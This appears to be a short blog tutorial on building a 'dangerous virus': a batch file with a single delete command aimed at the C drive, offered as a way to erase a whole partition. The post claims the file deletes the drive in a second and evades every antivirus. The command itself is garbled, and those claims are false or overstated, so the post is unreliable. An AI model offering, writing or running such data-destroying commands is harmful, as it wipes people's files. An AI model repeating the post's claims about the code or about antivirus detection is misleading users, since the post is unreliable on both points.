Making a Dangerous virus



****WARNING****
Please be careful because the code given in this post is dangerous and can cause permanent data loss.

This article is about learning to make a simple but powerful virus which can delete an entire drive partition within a second. You need no software tool for this purpose but just a little bit of batch programming. The best advantage of this virus is that it can not be detected by any type of antivirus.


What This virus will do:

This code or virus can delete C drive content or the system drive content within a second . Although it is very easy to make but still, very dangerous, because a whole drive filled with your data could disappear (erased).

Steps:

 1.Open Notepad and copy given code into it.

            @Echo off
            Del C:\*.* ly
    
2. Save it as name.bat (In name.bat, name is replaceable but .bat is must because all batch files require .bat extension to run).
3. Now running this file can delete all the content from C drive.

Note:

1. You can change partition name according to your requirement. e.g C is the partition being deleted in the above example.
2. Please be careful because it can delete a drive content within a second. 
3. Don't use it to harm others.


EmoticonEmoticon